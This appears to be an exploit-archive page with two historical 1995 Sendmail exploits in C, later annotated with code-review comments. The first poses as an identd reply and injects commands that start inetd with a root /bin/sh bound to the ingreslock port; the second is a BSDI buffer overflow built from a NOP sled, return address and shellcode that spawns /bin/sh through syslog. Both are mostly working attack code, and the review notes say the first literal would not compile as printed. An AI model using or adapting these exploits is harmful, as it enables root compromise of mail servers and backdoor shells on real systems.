*NIX Sendmail (8.6.9-8.6.10) - identd hack - execute commands
:
/* Sendmail 8.6.9 identd hack.  -- SnoCrash [r00t] */
/* 9/29/95 -- Fixed to make it compile on fuxin' SunOS */
/* Fixed some more so it can work on 8.6.10 -- 10/2/95 */
/* Final cleanup -- 10/4/95.                           */
#include <stdio.h>
#include <sys/types.h>
#include <sys/fcntl.h>
#include <gnu/types.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/* Buffer sizes used by main(): outbuf receives the sprintf()-formatted
 * reply, inbuf receives the read() from stdin.  read() is asked for one
 * byte fewer than SOCKET_BUFFER, but that spare byte is never set to NUL
 * (see the note in main). */
#define OUTPUT_BUFFER 4096   /* Output and input, */
#define SOCKET_BUFFER 512    /* with which we must up-put */
/*
 * Entry point.  Reads one request from stdin (fd 0), formats a fixed reply
 * text around it with sprintf(), and writes the result to stdout (fd 1).
 * No socket is opened here: the program expects fd 0/1 to be connected
 * already (the author's comments suggest it poses as an identd responder;
 * how it is wired up is not on this page).
 *
 * Review notes (historical 1995 code, kept byte-identical):
 *  - `void main` and calling exit() from it are non-standard; `int main(void)`
 *    returning 0 / 1 is the portable form.
 *  - `struct fd_set` is not the standard spelling (fd_set is a typedef) and no
 *    <sys/select.h> / <sys/time.h> is included.  FD_ZERO/FD_SET are prepared
 *    but no select() ever consumes fdesc, so those calls are dead code.
 *  - read() does not NUL-terminate inbuf, and inbuf is never initialised, so
 *    the "%s" conversion below can read past the bytes actually received
 *    (undefined behaviour).  The "- 1" leaves room for a terminator that is
 *    never written; the byte count read() returns is only compared, not used.
 *  - sprintf() is unbounded.  outbuf is OUTPUT_BUFFER (4096) bytes and the
 *    fixed text plus at most 511 input bytes is presumably meant to fit, but
 *    nothing checks it; snprintf(outbuf, sizeof outbuf, ...) plus a length
 *    test is the bounded form.
 *  - The return value of write() is ignored (short writes are not handled).
 *  - <gnu/types.h> is not a portable header.
 */
void main(void)
{
        struct fd_set fdesc;   /* File descriptor structure */
        char outbuf[OUTPUT_BUFFER];  /* Our output buffer */
        char inbuf[SOCKET_BUFFER];   /* ""  input "" */
        /* Preparing to read incoming data, captain. */
        /* NOTE(review): fdesc is set up here but never passed to select(). */
        FD_ZERO(&fdesc);
        FD_SET(0, &fdesc);
        
        /* Read it, Sulu! Now! */
        /* NOTE(review): only the sign of the result is checked; the count
         * is not used to terminate inbuf before it is formatted with %s. */
        if(read(0, inbuf, SOCKET_BUFFER - 1)<=0)                
                exit(1);
        FD_SET(0, &fdesc);
        
        /* Now we send our instructions, under the guise of innocent
         * ol' identd.  I find this ironic, that identd, supposedly
         * a standard that would help stop "evil hacker types", became
         * part of one of the bigger holes to ever hit the net.  Hmm.
         * Ain't life funny that way sometimes? :)
         */
        /* NOTE(review): the literal below is one long format string built
         * with backslash line continuations.  As shown on this page the line
         * ending in "too" has no trailing backslash, and the "\u" sequence
         * inside "funky" is not a valid escape in C99 or later, so the text
         * as printed would not compile -- this looks like an extraction
         * artefact rather than the author's original layout. */
        sprintf(outbuf, " \
%s : USERID : UNIX : Evil_Hacker_Type...Phear_Me.  So, like.. here are \
my evil commands for you to execute so I can rox yer box.  Check this out... \
\r\nCroot\r\nR<\"|/bin/echo ingreslock stream tcp nowait root /bin/sh /bin/sh > \
/tmp/.inetd.conf ; /usr/sbin/inetd /tmp/.inetd.conf \">\r\nHReceived: Pretty \
fucking eleet, eh?  Now I just have to sit here and babble so I can fill \
up your crappy buffer.  So I bet youre wondering how this got here.  Well \
lets just say you shouldnt run a Sendmail earlier or later than 8.6.11. \
8.6.12 has a whole load of different bugs, but this isnt one of them. \
Im not so sure about 8.7.x, but I wouldnt trust Eric Allman too much. \
weellll... it's been fun fucking with your box and all, but I really must \
be going, so I guess Ill see you around.  Tell all your friends to be nice \
and leave the door open like you did.  Thanks... its been real.   \unkyfunkyfunkyfunkyfunkyfunkyfunkyfunkyfunkyfunkyfunky....aaah this is just too
funky.\r\n \
", inbuf);
        
        /* Reply goes to fd 1; a short write is not detected. */
        write(1, outbuf, strlen(outbuf));
        exit(0);
}
+++++
*NIX Sendmail (8.6.12) - Buffer Overflow - 
:
/*****************************************************************/
/* For BSDI running on Intel architecture -mudge, 10/19/95       */
/* by following the above document you should be able to write   */
/* buffer overflows for other OS's on other architectures now    */
/* mudge@l0pht.com                                               */
/*                                                               */
/* note: I haven't cleaned this up yet... it could be much nicer */
/*****************************************************************/
#include <syslog.h>
char buffer[4028];
/*
 * Entry point.  Fills the file-scope `buffer` and hands it to syslog(3) as
 * the *format* argument.  Layout, as the author's own comments describe it:
 * indices 0..2023 set to 0x90, four bytes at 2024..2027 that the author
 * intends as the overwritten return address, then from index 2028 a
 * hand-assembled x86 byte sequence followed by the strings "sh" and
 * "/bin/sh".  Bytes past the last write stay zero (static storage).
 *
 * Review notes (historical BSDI/i386 code from 1995, kept byte-identical):
 *  - syslog(LOG_ERR, buffer) passes non-literal data as the format string.
 *    For any code that must log a caller-supplied buffer the safe form is
 *    syslog(LOG_ERR, "%s", buffer) (CERT FIO30-C).  This payload happens to
 *    contain no '%', but the pattern itself is the hazard a reviewer flags.
 *  - `void main ()` is non-standard; `int main(void)` is portable.
 *  - Only <syslog.h> is included.  Nothing else in the file needs a header.
 *  - The three bytes under `#ifdef z_out` are compiled out unless z_out is
 *    defined; the author's comment explains why they were replaced.
 *  - By my count the un-ifdef'd writes after i=2028 number 64, so the last
 *    write lands at index 2091 (2094 with z_out) -- far inside the 4028
 *    bytes declared.
 */
void main () {
   int i;
  /* indices 0..2023: repeated 0x90 */
  for(i=0; i<2024; i++)
    buffer[i]=0x90;
  /* should set eip to 0xc73c */
  /* (the four bytes the author intends as the overwritten return address,
   * written little-endian) */
    buffer[2024]=0x3c;
    buffer[2025]=0xc7; 
    buffer[2026]=0x00;
    buffer[2027]=0x00; 
  /* resume immediately after the four address bytes, so 0..2027 is
   * contiguous and nothing in between is left unwritten */
  i=2028;
/* begin actual
 program */
    buffer[i++]=0x89; /* movl %esp, %ebp */
    buffer[i++]=0xe5;
    buffer[i++]=0x33; /* xorl %eax,%eax */
    buffer[i++]=0xc0;
    buffer[i++]=0xeb; /* jmp ahead  */
    buffer[i++]=0x29;
    buffer[i++]=0x5e; /* popl %esi       */
    buffer[i++]=0x59; /* popl %ecx        */
    buffer[i++]=0xc7; /* movl $0xc770,0xfffffff8(%ebp) */
    buffer[i++]=0x45;   buffer[i++]=0xf5;
    buffer[i++]=0x70;
    buffer[i++]=0xc7;
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0xc7; /* movl $0x0,0xfffffffc(%ebp) */
    buffer[i++]=0x45;
    buffer[i++]=0xfc;
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x6a; /* pushl $0x0 */
    buffer[i++]=0x00;
#ifdef z_out
    /* compiled out unless z_out is defined -- see the author's note below */
    buffer[i++]=0x8d; /* leal 0xfffffff8(%ebp),%eax */
    buffer[i++]=0x45;
    buffer[i++]=0xf8;
#endif
/* the above is what the disassembly of execute does... but we only
   want to push /bin/sh to be executed... it looks like this leal
   puts into eax the address where the arguments are going to be
   passed. By pointing to 0xfffffffc(%ebp) we point to a null 
   and don't care about the args... could probably just load up
   the first section movl $0x0,0xfffffff8(%ebp) with a null and
   left this part the way it want's to be */

    buffer[i++]=0x8d; /* leal 0xfffffffc(%ebp),%eax */
    buffer[i++]=0x45; 
    buffer[i++]=0xfc;


    buffer[i++]=0x50; /* pushl %eax */

    buffer[i++]=0x68; /* pushl $0xc773 */
    buffer[i++]=0x73;
    buffer[i++]=0xc7;
    buffer[i++]=0x00;
    buffer[i++]=0x00;

    buffer[i++]=0x8d; /* lea 0x3b,%eax */
    buffer[i++]=0x05;
    buffer[i++]=0x3b;
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x00;

    buffer[i++]=0x51; /* pushl %ecx */

    buffer[i++]=0x9a; /* lcall 0x7,0x0 */
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x07;
    buffer[i++]=0x00;

    buffer[i++]=0xe8; /* call back to ??? */ /* (author's own question mark; the target is not identified here) */
    buffer[i++]=0xd2; 
    buffer[i++]=0xff;
    buffer[i++]=0xff;
    buffer[i++]=0xff;

    /* trailing data: "sh", NUL, "/bin/sh", NUL, NUL */
    buffer[i++]='s';
    buffer[i++]='h';
    buffer[i++]=0x00;
    buffer[i++]='/';
    buffer[i++]='b';
    buffer[i++]='i';
    buffer[i++]='n';
    buffer[i++]='/';
    buffer[i++]='s';
    buffer[i++]='h';
    buffer[i++]=0x00;
    buffer[i++]=0x00;

    /* NOTE(review): buffer is used as the format string, not as a "%s"
     * argument.  This is the classic non-literal-format-string pattern;
     * the defensive form is syslog(LOG_ERR, "%s", buffer). */
    syslog(LOG_ERR, buffer);
}
